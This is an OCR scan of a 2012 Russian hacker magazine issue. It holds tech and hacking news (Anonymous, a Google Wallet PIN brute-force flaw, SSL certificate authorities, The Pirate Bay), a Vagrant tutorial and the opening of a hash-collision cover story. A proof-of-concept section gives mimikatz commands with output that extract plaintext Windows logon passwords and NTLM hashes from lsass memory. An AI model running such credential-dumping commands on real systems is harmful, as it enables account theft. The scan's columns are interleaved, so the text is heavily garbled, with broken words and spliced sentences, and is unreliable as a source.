плуатируем о
1943-1945
ра зработчиков атомной бомбы в Ло с
http:Ut.co/3uNU3Jii
Причем
ГclcorelancOdЗr:
отн осятся к области те оретической физики.
:1
наименований переменны х в J avaScгipt. Н е экс плойты ломают код.
М ожет быть годным для обхода фильтров,
Разработчики лома ют код
например :1
Гclgeovedi:
Нерды- просто люди , которы е горят чем-то достаточно, чтобы тяжело над этим работать.
П одска зка: на звание
-., ....,
...
~~
, r l ~~ j
White
магическо -автома тическим
Д оро гой Гу гль, я успешно получил
5 уведомлений, 18
6 поп-апав
е-майлов
поп улярной [в области продаж) с и стемы уда ленн ого администрирования? Б ез аутентификации! Symaпtec рсАпуwhеге
исследования-в-области-ИБ>>.
12.5
выполнение произвольнаго кода.
о том, что ты
П ожалуйста, пошли мне еще.
Гclf1nux:
По жа луйста, почем у ... Ну почем у же мы до сих п о р плачем каж
Гclthealuc:
Это неплохая идея, делать жур н а лирование истории консоли
н а твоем веб-сервере: >ltee -а
Гcldaveaitel:
способом на уровень <<Супер лиде рского
меняешь политику конфиденциальности.
-/.bash_history 1 loggeг -t <<$USER[$$] $SSH_CONNECTION>>I
дый раз, когда прои схо дят кося ки с
SSL. Ведь
он и так умер неск ол ько лет
Гcli0n1c: Я потерял
80
фолловеров с тех
пор как объявил , что, возможно , о дин из них от в е т с твенен за
взлом экс -мини стра обороны.
на зад. Н астало время ти хой скорби ..
1!!1 liiil
Комментарий :
Гclevacide:
И деиствительно, SSL вымирает, но
Визуальный язык интернет
мы еще д ержимся за него . Но и уязв имости ,
конфиденциальности в основном
и провалы доверенных корневых центров,
о защите маленьких д евочек
все это лишь подрывает доверие.
ХАКЕР
8 9
. . . . . WP ftwl Удале нный доступ с права ми SYSTEM для наиболее
Рар е г не поднимает ваш те к ст
Гclclarkysj:
и
Гcljoshcorman :
04/159/2012
блондиночек.
011
www.epidemz.net
-
.MEGANEWS
ИНДИЙСКИЙ MICROSOFТSTORE ВЗЛОМАЛИ ХАКЕРЫ ИЗ EVILSHADOWTEAM. Дело не ограничи лосьдефейсом, парни также выложили скриншоты с файлами БДмагазина .
НАСВИСТИ МНЕ ССЫЛКУ
ANONYMOUS СЛУШАЕТ
ЗВУКОВОЙАНАЛОГQR-КОДОВГОТОВКРАБОТЕ
ОТ ВЕЗДЕСУЩИХ ХАКЕРОВ НЕ МОГУТ
УКРЫТЬСЯ ДАЖЕ ФБР И ПОЛИЦИЯ
SONIC t NOТIFY CREAТING MEOIA WПН PRESENCE LМ.
1S
f.Sf
lf.YI':IS
NEWS
АВОUТ l!lilШ
IIEМOS
Б ес платно е при ло же ни е Sопiс Experi ences, к оторо е пр е до ста вля е т до · ст уп к о в с е м о п исан
о
ным фун к циям , уже
1
вышло и доступно
VIEWERS
в в е рсия х для и Android.
iPhone
D
ели бы нам вздумалось писать обо всехдеяниях хактивистовАnопуmоus, то, наверное, пришлось бы учредить отдельное дополнение к журналу.
Однако некоторые проделки хакеров «бесчисленного ле гиона» все же достойны упоминания . Н апример, в прошлом месяце из-за них здорово опозорились ФБР и полиция Скотланд-Ярда. П о сооб щению Би-Би-Си, в январетекуще го года хакеры каким-то образом под с лушали телефонный
разговор между экспер тами ФБР и полиции' В ходе беседы сотрудники органов как раз делились информацией о са
мих Aпoпymous и обсуж дали планы ареста членов гр у ппы , включая даты и имеющиеся доказательства. Хакеры вы ложили запись ра згово ра на
SONIC CAST
SONIC liVE
SONIC GOODS
Крометого были опуб ликованы фрагменты переписки по электронной почте между Скотланд-Ярдом и ФБР, гд е
~цWII..-.:10
..... ~~~ey-tch
-
YouTube, где она доступна д о
сих пор: youtu . be/p i ЗspwzUZfQ .
""""""'~
прекрасно видны адрес а остальныхучастников конфе
ренции [ pasteЬiп . com/BG4jlhaB I. ФБР уже подтверд ило факт перехвата информации и за являет, что разыскивает виновников. Подразд е ление по
1]
последнее время мы частенько упоминаем на стра ни цах журнала
бо рьбе с киберпреступностью Скотланд- Я рда также сооб
QR-коды, да и сами не редко пользуемся ими в жизни. Технология дей
щает, чтоинцидент расследуется. Правоохранительным
ствительноудобная и, соответст венн о, набираю щая популярность.
орга нам явноочень интерес но, каким образом Анонимы
Но, думаем, многие согласятся с тем, что не всегда удоб но пытать ся навести
смогли заполучи т ь запись.
камеру с мартфона на какой-либо объект, переживая о том, хорошо ли его
видно. Команде стартапа Soпic Notify [ soп i cпoti f y. com l, очевидно, не давала по коя та же мысль, и из нее родилась новая техн ология - своеобразный аналог QR-кодов. Звуковой.
По задумке разработчиков, устройства на базе
iOS и Aпdгoid могут на
ультразвуковых частотах обмениваться данными небольшага объема. К при меру, возможностей Soпic
Notify вполне достаточн о для передачи сс ылки и ее
мгновенного открытия на телефоне.Кр оме того, ультразвуковой сигнал можно
интегрировать в любой музыкальный трек или звуковую дорожку видеороли ка, чтобы слушатель мог получить доступ к дополнительн ой информации. Метаданные можно встроить в любую аудиотрансляцию, что, по мнению создателей, будет востребовано в м узеях или вы ставочных гале реях, для
обеспечения посетителей разнообразными сведениями об экспонатах и их авторах. На концертахтех н ология позволит, к пример у, отк рытьсайтисп ол нителя, ил и обнаружит ь страницу с текстом исполняемой песни. Признаем ся, нам на ум почему-то приходят не муз еи и галереи, а несколько иные варианты
при менения технологии
:1.
• СУДОБЯЗАЛ «ВКОНТАКТЕ»
15АПРЕЛЯУОТАЗАПУ-
ВЛАСТИ ШТАТАНЕВАДА
В ПЕРВЫЕ ЧАСЫ ПОСЛЕ
выплатить компенсацию
СТИТ В МОСКВЕ СЕТЬ LТЕ,
ПРИНЯЛИИСТОРИЧЕСКОЕ
СПЕЦОПЕРАЦИИ ПОЗА-
НА САЙТЫ АМЕРИКАНСКИХ
вразмере220000рублей
работающую на частотах
РЕШЕНИЕ: официально
КРЫТИЮ
ФОНДОВЫХ БИРЖ
ввидунарушенияправинтел-
разрешили езду по т рассам
шедшей
общего назначени я роботи -
в с емирной сети с низился
NASDAO, BATS и других осуществила группа LONGwave99. Таким
на композиции группы « Ин-
2500 -2530 М Гц и 2620 -2650 М Гц . ПереходсWiМАХ на LTE с остоится в ночь с 14 на 15
зированным авто м обилям
финити >> и певицы Максим .
апреля .
без водителя .
на 2-3 %, говорятэксперты DeepFi eld Netwoгks .
ли « движение 99 '/о >> .
лектуальнойсобственности
MEGAUPLOAD, про 19 января , трафик
УСПЕШНУЮ DDOS-ATAKY
образом хакеры поддержа -
ХАКЕР
012
www.epidemz.net
04/159/2012
НОВАЯМАС OSX 10.8- Mountain Lion («Горный лев » ) nоявится в nродаж е в концелета 2012 года .
К АК ВЫЖИВАЕТ
ВЗЛОМ
RAPIDSHARE
АДВОКАТ ИЗВЕСТНОГО ФАЙЛООБМЕННИКАДАЛ ИНТЕРВЬЮ
m
ПОДБИРАЕМ
э
egaUpload закрыли, другие файловые хостинги здорово напуганы, нo R apidShaгe в это время живет и здравствует.А ведь всего два года назад файлаобменник упоминался в докладе
RIAA и
МРАА, как одно из
GOOGLEWALLET
PIN
К ВИРТУАЛЬНОМУ БУМАЖНИКУ
лектронную платежную сис т ему запустили еще в середине
Google Wallet 2011 года . Разработка
предназначена для А n dгоid-смар т фонов, имею
«извес тных мест » по размещению пиратского контента. Как <<рап иде » удалось
щих
уйти из-под прицела правооб л а д ателей, рассказал ресурсуТоггепtFгеаk
по беспроводной связи мало г о ра ди уса дейс т вия. То
адвокат компании Дэниел Р ей мер. П риведем самые интересные тезисы из его
есть
рассказа:
в магазинах с помощью телефо н а и установ л е н ного н а н ем
Google Wallet позволяет расплачиваться за п оку п ки
специально г о приложения. Это не что иное, ка к << в ир т у
RapidShaгe всегд а по П е рв омутребавани ю правообладателей удаляет
альный бумажник».
любые файлы, размещенные у них н а хостинге. Этим занимается специальный отдел
N FC. Испол ь зуется дан н ая система д л я платежей
Кстати, подобнаятехнология используе т ся д ляоплаты
-anti-abuse depaгtment.
проезда в Лондонском метро и в м етроЯпони и. Д л я п ер е
Компания разработала с п е ц иаль н ый краулер, который постоянно монито
рит форумы, доски объявленийиварезные блоги в поиске информации о на
числения средств за покупку или проезд нуж н о лишь
рушении интеллектуальных прав, которые имеют место в системе RapidShaгe.
провести телефоном рядом с т ерминалом оплаты. Вопрос безо п асности п одоб н ых платежных систе м
Собранная информация оценивается, проверяется и обрабатывается все тем же отделом. Конечно, Реймер отказался сообщить подробно сти о краулере или
всегда был актуальной темой. Google заверял, что Google
назвать идентификатор бота. Но отметил, что это <<весьма сложная техноло
Wallet отлично защищен,- к примеру, использует м икро схему Secuгe Element, где в заш иф рован н ам в ид е х рани т
гия>>, способ ная обойти практически любые способы за щиты форумов от неза
пользовательск и е д анные. Она отделена от самого теле
регистрированныхпользователей.
Еще в декабре
201 О года компания потратила большие деньги, наняв высо кооплачиваемую вашингтонскую фирму Dutko, которая имеет доступ в высшие эшелоны власти и там отстаивает интересы RapidShaгe.B задачу Dutko т акже
фона и ОС, так что только
Google Wa ll et може т работать
входит работа над имиджем RapidShaгe.
и защищено человеком , может быть им же и взломано.
с ней. Но, как показывает практика, все, что создано Ока з алось, подобрать РIN-код к кошельку можно путем
Еще один важный козырь живучего Файлаобменника- отсутствие пар тнерской программы. Таковые, по мнению правообладателей, стимулируют
брутфорса, даже без обращения к серверу Google! Виной
пиратс тво.
всему-уязвимости в архитектуре приложения.
Специалист по безопас ности Д жошуа Руби н, сотруд
В RapidShare уверены: файловый
ник
выгляд етькак
цию . В базе обнаружиласьтаблица со странным названи
приличный се рви с вроде
zveloLABS, решил внимательно изу ч ить внутреннюю Google Wallet хранит всю информа
базу данных sqliteЗ , где
ХОПИН Г ДОЛЖеН
ем
Dropbo x'a, как
metadata. В таблице было всеготри строки, но в каждой
из них- крупны й блок бинарных данных.
р есnектабе л ьна я компан и я , кото р а я
Один ряд на зывается gmad _ bytes _aгe_ fun - это нечто
зан има ется исклю
чительнолегальным
вроде зашифрованн ой файловой системы для хранения
бизнесом .
данных. Содержим ое б инарныхданных в этой строке явно предполагает, что там находится вся информация о бан ковской карте , пишет Рубин. Д ругая строканазывается
devicel nfo, и для понимания
этих данных пр ишлось выяснить, чем они обработаны.
Д а н ные оказалисьскомпилированы при помощи про токола P гotoco l Buffeгs. Это открытая библиотека для уни фикации данны х в сообщениях между системами. Чтобы прочитать эти данные, необходимо указать правиль н ый
messagefoгmat в файле .ргоtо [ P гotocol BuffeгBasics: Java l. Сделав подходящий .ргоtо, Джошуа Рубин сумел прочесть данные и был глубоко шокирован. Обнаружились
Unique
Useг IDs [UU IDI, информация об аккаунтах Google IGA IAI и Cloud to DeviceMessaging IC2DM, пуш-уведомле н ия], статус Google Wallet Setup, параметр <<TSA» !видимо,
ОБНОВИЛСЯ ЛЕГЕНДАРНЫЙ МЕДИАПЛЕЕР
Tгusted Seгvices], статус SE, и самое главное-да нн ые • .. :
'
•
•
....
-
О
'
·~
L-
-
~
'1 •
~
CaгdPгoducti oп Lifecycle ICPLCI и PIN-кoдl Хэш
VLC ОБНОВИЛСЯ ДО ВЕРСИИ 2.0 TWOFLOWER. СРЕДИ УЛУЧШЕНИЙ:
достаточно попробовать максимум
1О 000 хэш ей SHA256,
так что криптографич еская защита перестает быть про блемой .
Pl N-код подбирается менее чем за секунду даже
на с мартфоне, так что смысл ограничения на пять попыток ввода на сервере полностью теряется, как и смысл всей
ЭКСПЕРИМЕНТАЛЬНАЯ ПОДДЕРЖКАДИСКОВ BLU-R УИ НОВЫХ ФОРМАТОВ. ХАКЕР
PIN -кода хранится в зашифрованном виде
в SHA256. Но зная длину Pl N -ко да la э т о четыре ци фры!,
системы безопасности
zvelo LABS сообщает,
Google Wallet вообще. Эксперт Google уже п ро
чторазработчик и
информированы абуязвимости и сейчас стараются как можно быстрее закрыть дыру. П осмотреть, как Рубин демонстрирует уязвимость, можно здесь:
youtu.be/ P655GXn E JC .
013
04 / 159/2012
www.epidemz.net
MEGANEWS
ВЫШЕЛ GOOGLE CHROME BETAДЛЯANDROID 4·Й ВЕРСИИ. Интересно, что браузер не поддерживаетflаsh .
ДОВЕРИЕ КSSL СЕРТИФИКАТАМ ПАДАЕТ
ЦЕНЗУРА В TWITTER И BLOGGER
ПРОШТРАФИЛСЯ ЕЩЕ ОДИН УДОСТОВЕРЯЮЩИЙ ЦЕНТР
ИНТЕРНЕТ-КОМПАНИИ БУДУТ
ВЫБОРОЧНО ФИЛЬТРОВАТЬ КОНТЕНТ
Комnания
планирует вообще отключить онлай новые провер ки аннулированны х
SSL · сертификатов
в будущи х версия х
Chrome . Их заменят офлайновой базой аннулированны х
се ртифи катов, об· НОВЛАТЬСЯ КОТО рая
будет чере з со· фтв ер ны е аnдейты.
н
m
чередной камешек упал в огородсертификатов
SSL в част·
е поднимая шума, компания Тwittегобъявила ото м, что впредь будет блокировать сообщения пользователей в «ОТ·
дельных странах>>, чтобы авторы не нарушал и приняты е там
нормы. Такое сообщение появилось в корпоративном благе Twitteг.
ности и всех нынешних ц ентров сертификации в цел ом .
Там же поясняется, что по мере расширения сервиса, он становит·
Ц ентр сертификации Tгus twave признал факт выдачи такого
с я доступен в ст ранах, где иначе смотрят на << пределы свободы
сертифика т а коммерческой компании для ее корпора тивно й сети.
самовыражен ия>>. В некоторых странах эти пределы таковы, что
Сразу после этого был создан соотве тств ующий тикет в
существовать там Twitteг не может вовсе, нужна <<географическая
Bugzill a,
и на·
чалось активное обсуждение в г руппе mozi lla .dev.secuгity.po licy. Если
ценз ура>>. Пока компания не прибегала к новым возможностям,
удостовер яющий центр ради коммерческой выгоды позволяетс ебе
подчер кивае тся в благе. Разумеется , пользователи не замедли ли
выдать корневой сертификат некой непонятно й компании, зто д ей ·
выраз ить свое возмущение зтим нововведением, и протест под ·
ствительно может обернуться непредсказуемыми последствиями.
держало движение
Фирма может подписать что угодно, не обращая сь в удостоверяющий
тирова ть исполнительный директор Twitteг Дик Костол о. По его
центр, и становится возможной атака типа maп·in·the·middle и даже
словам, система филырации т витав [или целых аккаунтов] нужна
прослушка защищен ного трафика по SSL/ТLS. В итоге проект
Mozilla разослал
Anonymous.
Ситуацию поспешил прокоммен·
не для осуществления цензуры, а для того, чтобы сервис вообще
всем удостоверяющим центрам,
смог продолжить работу в определенных государствах. Сообщения
корневые сертификаты которых постав ляют ся в составе Fiгef ox
будут фильтроваться исключительно по запросу властей и только
и других продуктов
для пользователей сервиса в конкретной стране. Слабое какое-то
Mozilla,
письмо с требованием отозвать все вы
данные сторон ним организациям вторичные корневые сертификаты
и уничтожи ть используемые для хранения этих сертификатов
HSM·
утешение .
Буквально на следующий день после зто го заявления еще и
модули. Удостоверяющие центры должны выполнить эти треб ова ния
сообщил, что отныне компания тоже может блокироватьдоступ к от·
до
дельным благам, создаваемым на сервисе Bloggeг, по требованию
27 апреля.
Если же требования не будут исполнены,
Mozilla
грозит·
с я исключить сертификаты всех недобросовестных удостоверяющих
правительств определенных стран мира. Впрочем,
центравизсвоего списка.
оставляет читателям благо в возможность отключить переадресацию.
I•J>t>Ч'*/IW-!Ьof"'!!lll_,_
...._.,_..,.
Wolfrain.\lph.:i
1ю
Google хотя бы
WOLFRAM ALPHA - БАЗА ЗНАНИЙ И НАБОР ВЫЧИС · ЛИТЕЛЬНЫХАЛГОРИТМО~ которую часто ошибочно называют поисковиком , под·
. .. ..
..
C:.l·
вергласьсамомузначительно
муобновлениюза последние годы. Была представлена про-
двинутаяверсияWоlfгаmдlрhа Рго. ПодписканаРго-версию
ПОДАННЫМ OCCASSIONAL GAMER, большая часть
обойдется в 4,99$ в месяц
рынкасмартфоновнабазе
12,99$длястудентов1, но
Windows Phone 7155 %1при
INTEL ПРЕДСТАВИЛА про· цессоры Саге i5-2380P, i5· 2450Р и i5-2550K на м икро архитектуре Saпdy Bridge.
сейчастакжепредоставляется
надлежит НТС . Следом идут
Главное отличие новинок
и бесплатный тестовый период
Samsung 128%1, LG 112%1 и Nokia 14%1.
заблокированный
длительностью 14дней .
ХАКЕР
011.
www.epidemz.net
GPU.
04/159/2012
.•
'
ф WeXLeГ.
ОБ ОКОНЧАНИИСЛУШАНИЙ П О ДЕЛУТНЕ т олько
PIRATE ВАУ И
НЕ
www.wexteг.гu
Электронная книга с доступом в Интернет v
Чи
м отри.
и.
v
лушаи.
П О С ЛЕДНИЕСВОДКИ О ПОПУЛЯРНОМТРЕКЕРЕ
<< Кач ай т е мои кн иги б ес nл а тн о и , ес ли они вам понра в ятс я ,
ку п ите б у мажн у ю к оп и ю . Э то ве р н ы й п уть зая в и ть инд уст р ии ато м , ч то жа дн о с ть в е д е т в ни
тье
13
длился с
,Ji irate ~ар
ку да ». П ау л о Коэ льо .
а к известно, судебный п роцесс - штука не быстрая. Раз бирате л ьство в отноше н ии а д м ин истрации<< П иратской бухты» иск л ю ч ением из этого правило не являлось-суд
2008
года.
Н овость, пришедшая в начале февраля, подводит под этим про
цессом о п ределенную черту [хот я и нельзя сказать, что все кончилось!. Дело в т ом, что четверо ос н ова т елей
The P iг a te В ау проиграли в В ерхов
ном суде Ш веции свою последнюю попытку апелляции. Суд отклонил их апелляцию, оставив в силе приговор от ноября
201 О года , который 4, 8 и 10 месяцев, а также возмеще ние правообладателям ущерба в размере 46 миллионов крон [около 6,8 млн долларов!. По идее, теперь Гопфрид Свартхольм, Фредерик предусматриваеттюремные сроки
Нейж, Питер Сунде и Карл Лундетрем должны отправиться в тюрьму. Утешает лишь то, что в виду нюансов шведской судебной системы
[а также потому, что некото р ые и з обви ня емых более не проживают в Швеции! основатели Т РВ не намереваются ни отбывать срок, ни пла тить деньги. Напротив, они планируют обратиться в Суд Европейского
с оюза и бороться дальше. Хотя сам ThePiгate B ay.oгg в приговоре суда не фигурирует, и прямого поста н овления о его закрытии нет, нынешняя
администрация[ккоторойупомянутаячетверкауженеотносится,на данный момент в команде не осталось ни одного из тех , кто начинал это
дело), решила перестраховаться. Самые внимательные наши читатели наверняка заметили, что в февралетрекер переехал в шведскуюдо менную зону .SE, где и остается на моме н т написания этих строк. Таким
образо м«Пиратскуюбухту»укрываютотамериканскихправоохрани тельных органов, которые т оже давноточатзуб на популярный ресурс. Поте м же причинам ТРВ в этом месяце начал активный переход на mаgпеt-ссылк и вместо tоггеnt-файлов. Если на серверах «Бухты»
не будет ничего криминального, даже tоггеnt-файлов [каковые,
WEXLER.
в об щем, тоже не являются чем-то плохим, но это еще нужно до
Т700б
казывать в суде!, обороняться трекеру станет еще легче. К тому же, это nозволяет здорово экономить место на серверах. Пользовател и
toггentfгeak.com уже проверили nосле д нее утверждение: по их данным, общий размер базы трекера сейчас составляет всего мегабайта, или
90
164
мегабай т в архивированном виде' Вот уж дей
Лучший выбор бесплатных книг
ств ительно, компактность налицо. Н о, nо м им о судов и переездов,
ад ми н истрация <<Бухты» по-nрежнему борется за свободу инфор
и популярные новинки.
мации в целом. Яркий тому пример-эксперимент по nродвижению
Скачивайте и читайте на
писателей, музы кантов и других творцов - The Ргоmо В ау. П ервым
www.wexLer.ru!
«n родвигаемым>> [хотя, ко н ечно, скорее это он продвигал д а н ный
проектl стал nисатель П ауло Коэльо, чье лицо недавно м ожно было наблюдать на главной стра н ице тоже не одобряет
SO PA и
The Piгate Вау. Оказывается, П ауло
пишет, что продажи его бумажных книг
<<МЕТРО 2033>> Д МИТР И Я ГЛУХ О В С КОГО И ЕЩ Ё
Cl.
только выросли с тех пор, как читатели разместили их н а Р 2Р
<(
сай тах. В целом, авторские раз д а ч и не новость, нотакой рекламы
о
ДВА РОМАНА КУЛЬТО В ОЙ СЕ РИ И БЕСПЛ АТНО В ЭТО Й ЭЛЕКТ Р О ННО Й КНИГЕ WEXLER
им, пожалуй, еще никто не делал. Коэльо призвал всех творческих
людей поддержать идеютрекера.
Х АКЕР
04/159/2012
YOII
www.epidemz.net
ll!!!IJ
ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ: 8 (800) 200 96 60
.HEADER
КОЛОНКАСТЁПЫИЛЬИНА
О БЬIСТРОМ СОЗДАНИИ ВИРТУАЛЬНЬIХ МАШИН ЗА Д АЧА
команда <<Ьох
add
<имя виртуальной машины»>
Один из важных плюсов облачных се рви
отвечает непосредственно за создание вирту
сов-возможность быстро поднять столько
альной машины.
серверов, сколько нужно. Хочешь два- будет тебе два. Хочешь сто- два клика мышью и
В качестве параметра ей передается путь до специального Ьох-файла- контейнера,
будет сто. Все зависит только от твоего ко
позволяющего быстро развернуть на вирту
шелька, платформа же позволяет разверн ут ь
альной машине нужную ОС. Мы указали не
столько виртуальных серверов [с нужными
просто путь, а ссылку: в этом случае Vagгant
ресурсами), сколько тебе нужно. С виртуаль
сам выкачивает из сети образ.
ной машиной на домашнем компьютере такой
Команда
<<init>>
инициализирует ОС, причем
фокус не проходит. Чтобы создать виртуалку,
в качестве параметра необходимо указать
задать ей нужные настройки и, что муторнее
тип системы: в нашем случае это 32-битная
всего, установить ОС. уходит уйма време-
Ubuntu Lu cid [10.04)Лосле выполнения этих
ни. В один момент мне стало интересно: а
двух команд создается полностью работоспо
можно ли как-то автоматизировать процесс и
собная виртуальная машина с
разворачивать новые виртуальные машины
Посл едняя команда- <<vagгant
по-настоящему быстро? Ну, то есть указать
запускает ее в фоновом режиме.
что-то вроде: «Хочу три виртуальные машины
512 Мб на борту. up»- лишь
Таким образом можно создавать и запу
с такими-то настройками и установленную на
стить нужное количество виртуалок. Управ
них
лять всем этим хозяйством можно опять же
Ubuntu
последней версии>>- и получить
За п уск вирт у ально й м а ш и ны ч е ре з Vagraп t
Vagrantbox.es Thesestar'ldaldleЩ)Iatesarecarledьasetю:r~ aJ'\dtr.swetlsote,ssнnptya~stottюJ.~peopleha...e Ьflf>nr'llceet\OUghtoiТiilkepiA:I~ct,o~vallaЬie
Suggest а
Вох
э ти три виртуальные машины без лишнего
через консоль Vagгant . Работающую виртуаль
add•ttothe~stl!elow
геморроя. В поисках подходящего решения
ную машину можно оставить:
AvaiJaЬi e
Boxes
я наткнулся на открытый проект Vagгant
[ vagгantup . com ).
vag r ant suspe nd
AeQir
Чтобы посмотреть статус каждой из вир
РЕШЕНИЕ
туальной машины, есть специальная команда
Используя в качестве основы бесплатный
~
41 AUP
(DeЬwl
AegtfWDeoaт{SiaЬie
для мониторинга :
"40<\J
и потому особенно любимый нами Oгacle's
ViгtuaiBox [4.0.х или
,CJA,eQir(OeЬraгo
~f>4.bl)
lltp
4.l.x), Vagгant позволяет
~graf11.ьaseo~mages
s3 arтw:onaws
tonWagrarc-deЬ!aМE!м)'-
05ЬФ<
vagrant status
создавать и конфигурировать виртуальные К любой из гостевых ОС можно подклю
машины динамически.
Как это происходит, предлагаю рассмотреть
прямо на примере. Загружаем с
читься по
SSH,
используя сам Vagгant:
Н а с а й т е vа gr а пtЬо х.еs до с т у пны обр аз ы разны х ОС для б ы ст р о г о раз ве рт ыв ания
downloads.
vagгantup . c om нужную версию дистрибутива
[есть версии для Windows, Linux, Мае
05 Х)
vagrant ssh
и
поднимаем наш первый инстанс [виртуальную машину):
Если запустить приложение без пара ме тров, то оно выдаст список всех доступных команд.
$ vagrant
Ьох
add lucid32 http: // fi les. vagrantup.com/lucid32 . box $ vagrant init lucid32 $ vagrant up
Пар аметры гостевых ОС можно отконфигу
рировать[наnример, проnисатьстатические IP), задав нужные настройки в сnециальном с криnте Vagгantfile, который nишется на
Ruby.
С его же помощью можно, к nримеру, про Три команды- и новая виртуальная
бросить nорты до нужной тебе виртуальной
машина с установленной ОС запущена [если,
машины. И , конечно же, ты можешь создавать
конечно, ты не забыл предварительно уста
свои Ьох-файлы, из которых далее быстро раз
новить ViгtuaiBox)! Как несложно догадаться,
вертывать гостевые ОС.
К одпро ек т а н а пи с ан на Ruby
ХАКЕР
016
www.epidemz.net
04 / 159/ 201 2
Proof-of-Concept ИЗВЛЕЧЬ ПАРОЛИ ПОЛЬЗОВАТЕЛЕЙ
WINDOWS
ИЗ ПАМЯТИ
Существует немало способов и специальны х утилит, чтобы извлечь хэ ши пользоват ел ь ских паралей из системы. А можно извлечь параль в открытом виде? Можн о!
О ЧЕМ РЕЧЬ?
КАК ЭТО ВЫГЛЯДИТ? mimikatz. Вывод
Не так давно мы делали комплексный материал о том, как можно
Попробуем
сдампить пользовательские парали из Windows-cиcтeмы. Ути
это не должно nугать: чтобы увидеть па роли, не нужно говорить на
лита
языке Шарля Де Голля:
Windows Cгedentials Editoг- одно из наиболее известных
будет на французском языке, но тебя
и универсальных решений. Однако н е давно французские ис
следователи выпустили совершенно убойную наработку
mimikatz
mimikatz
1 .е х86
(pre-alpha)
/ * Traiteme nt du Kiwi • ;
[ Ыog.gentilkiW I .com/ mimikatz ]. Помим о уже и звестных приема в, она умеет ... извлекать парали пользователей в открытом виде .
Правда , только тех, которые осуществили вход в системе. Сна
mimikatz # privilege: : debug Demande d'ACTIVATION du privilege : SeDebugPrivilege
ок
чала мы п одумали, что это фэйк и nодстава, но первый же запуск
утилиты подтверди л- все работает. Прога предоставляет свою собственную консоль, из которой можно запустить необходимые
модули для различных ситуаций [конц епция «швейцарского ножа»]. Для извлечения паралей в виде открытого текста nонадо бится всего три команды:
mimikatz # pri vilege: :debug mimikatz # iпject: :process lsass . exe sekurlsa.dll mimikatz # @getlogonPasswords
mimikatz # inject: : process lsass.exe sekurlsa . dll PROCESSENTRY32(lsass.exe).th32ProcessiD = 488 Attente de connexion du client . . . Serveur connecte а un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des donnees de sec urites dan s LSASS mimikatz # @getlogonPasswords Authentification Id : е;43 4 898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msvl_e : lm{ е52сасб7 419а9а224а З Ые8fЗfабсЬбd }, ntlm{ 8846f7eaee8fЫ17adeбbdd8ЗeЫ586c } wdigest password password tspkg :
КАК ЭТО РАБОТАЕТ? Казалось бы: нафига хранить парали в открытом виде, если вы полнить авторизацию можно даже с nомощью хэша? Н а самом
деле, по с леднее возможно не везде. Поэтому в винде есть специ
альный поставщик безопасности wdigest [ technet . micгosoft.com/ en-us/libгaгy/cc778868[W5 . 10 ] . asi!XI. чтобы поддерживать такие типы авторизации как, например, НТТ Р
Digest Authentication
и другие схемы, где необходимо з нать па роль [и хэша недоста точно]. Напо сле док скажу, что буквально в момент выхода жур нала в печать аналогичный функционал появился и в упомянутой Французский вывод
ХАКЕР
mimikatz не должен тебя
пугать
выше утилите
WCE . I
017
04/159/2012
www.epidemz.net
COVERSTORY
Sanjar Satsura [sanja r0xakep.ru, twitter.com/sanjar_satsural
В современном IТ-мире контрольную сумму файла
или любых других важных данных принято считать фундаментом для подтверждения неизменности исходной информации. Но если ты вспомнишь историю с руткитом Stuxпet, то поймешь, что уязвимости в популярных алгоритмах для
расчета таких сумм могут привести к большим
катастрофам . Давай проверим это.
www.epidemz.net
Опа с ный двойник
E''·'tJ:II:ttt На нашем диске ты
Вся информация
найдешь исходники,
предоставлена
описанные
исключительно
в статье, примеры
в ознакомительных
поддельных
целях. Ни редакция,
сертификатов ,
ни автор не несут
а также видео ,
ответственности за
в котором наглядно
любой возможный
покаэан процесс
вред, причиненный материалами данной
генерации коллизий.
статьи.
ЛЕГКИЙ СПОСОБ ПОДДЕЛКИ
КОНТРОЛЬНОЙ
СУММЫ ИЭЦП с помощью
коллизий
www.epidemz.net
COVERSTORY
Те о
ИЯ
недавний взлом keгnel.oгg: тогда лишь самые опытные админи
38 той 57, 76 и так далее . Таким образом, nары входных значений [38,57 ], [38.761 образуют КОЛЛИЗИИ ДЛЯ ХЭШ-фуНКЦИИ F[x] . Чтобы хэш-функция F считалась криnтаграфически стойкой,
страторы заметили подвох, сравнив контрольную сумму скачанных
она должна удовлетворять трем основным требованиям, на которых
исходников с контрольной суммой, nредставленной на сайте.
основано большинство применений хэш-функций в криnтографии.
Всегда ли ты проверяешь контрольную сумму скачанных из сети файлов? Думаю, нет. Хотя, конечно, для большинства юниксоидов это
привычное дело, ведь целостность и достоверность скачанных обра зов и исходниковпорой играет важную роль. Достаточно вспомнить
Ты наверняка знаешь, что контрольная сумма файла зачастую
же хэш-сумму, что и у. В частности, для входного значения
же хэш-суммой будут обладать входные значения
1.
вестными из которых являются
MD4, MD5
и
SHA-1 . Однако
F[x]=m.
с недавних
пор встала огромная проблема подтверждения целостности исходной
Необратимость: для заданногозначения хэш-функции mдолжно быть nрактически невозможно найти блокданных х, для которого
nредставляет собой криnтографические хэш-функции, самыми из
2.
Стойкость к коллизиям nервого рода: для заданного сообще н ия
информации при помощи более криптастойких алгоритмов хэширова
m должно быть nрактически
ния [контрольных сумм]. Имя этой nроблемы- коллизии криптогра
общение n, для которого F[n] = F[m ].
фических хэш-функций. Так, наnример, если хэш-функция исполь
зуется для создания цифрового ключа, то умение строить для нее
3.
невозможно подоб р а т ь другое со
Стойкость к коллизиям второго рода: должно быть nракт и чески не возможно nодобрать nару сообщений, имеющих одинаковый хэш.
коллизии равносильно умению nодделывать цифровой ключl Именно nоэтому в идеале не должно существовать сnособа поиска коллизий для криnтографических хэш-функций более быстрого, чем nолный
Существует большое количество алгоритмов хэширования
с различными характеристиками [разрядность, вычислительная
перебор [брутфорс] . Если для некоторой хэш-функции находится более
сложность, криnтастойкость и так далее]. Простейшим nримерам
быстрый сnособ, то эта хэш-функция nерестает считаться крипта
хэш-функций может служить
стойкой, а также использоваться для nередачи и хранения секретной
мом хэш-функции, а представляет из себя алгоритм вычисления
информации . Но всегд а ли это так? Оказывается, далеко не всегда.
контрольной суммы. По скорости вычисления он в деся т ки и сотни
ISMUttiiil
значительно nроще в апnаратной реализации. Однако n л атой за
CRC,
который не явл я ется ал г ори т
раз быстрее, чем криптографические хэш-функции, а также
Итак, коллизией хэ ш -функции
F называются два различных входных F[x] = F[y]. Рассмотрим в качестве
